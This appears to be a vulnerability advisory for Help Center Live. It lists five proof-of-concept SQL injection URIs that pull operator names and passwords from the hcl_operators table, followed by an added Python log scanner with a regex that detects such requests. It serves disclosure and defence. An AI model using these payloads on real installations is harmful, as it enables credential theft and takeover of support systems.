Help Center Live Multiple Input Validation Vulnerabilities
No exploit is required. The following proof-of-concept URIs demonstrating the SQL injection issues are available:

http://www.example.com/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200, 0,operator,password%20FROM%20hcl_operators%20WHERE%201/*
http://www.example.com/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0, operator,password,0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*
http://www.example.com/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0, password,0,operator,0,0%20FROM%20hcl_operators%20WHERE%20id='1
http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT password,password FROM hcl_operators WHERE id=1/*
http://www.example.com/support/lh/chat_download.php?fid=-99' UNION SELECT password,operator,password FROM hcl_operators WHERE id=1/*
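A log check for requests shaped like the URIs above, as an added example that is not part of the original advisory: it flags the five listed scripts when their id, tid, fid or status parameter carries a quote, a UNION SELECT, the hcl_operators table name or a comment opener. The function names, the sample request targets and the benign parameter values are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names taken from the proof-of-concept URIs above.
WATCHED = {
    "/faq/index.php": "id",
    "/tt/view.php": "tid",
    "/tt/download.php": "fid",
    "/lh/icon.php": "status",
    "/lh/chat_download.php": "fid",
}

# Markers common to the listed requests: a quote breaking out of the value,
# UNION ... SELECT, the operators table name, or a comment opener.
SQLI = re.compile(r"'|\bunion\b.+\bselect\b|hcl_operators|/\*", re.I | re.S)


def check_request(target):
    """Return (script, param, decoded_value) for a suspicious request, else None."""
    parts = urlsplit(target)
    for script, param in WATCHED.items():
        if not parts.path.endswith(script):
            continue
        # parse_qsl percent-decodes, so %20 / %27 encodings are normalised
        # before matching.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == param and SQLI.search(value):
                return (script, param, value)
    return None


def scan(targets):
    """Run check_request over an iterable of request targets; keep the hits."""
    return [hit for hit in map(check_request, targets) if hit]


# Constructed sample: two ordinary requests (assumed benign values) and two
# requests in the shape the advisory lists, one percent-encoded and one raw.
SAMPLE = [
    "/support/faq/index.php?x=f&id=12",
    "/support/lh/icon.php?status=online",
    "/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,0,operator,"
    "password%20FROM%20hcl_operators%20WHERE%201/*",
    "/support/lh/icon.php?status=-99' UNION SELECT password,password "
    "FROM hcl_operators WHERE id=1/*",
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE):
        print(f"suspicious {param}= on {script}: {value!r}")
```

Only the parameter named for each script is inspected, so this is a triage filter for existing access logs rather than a replacement for fixing the queries.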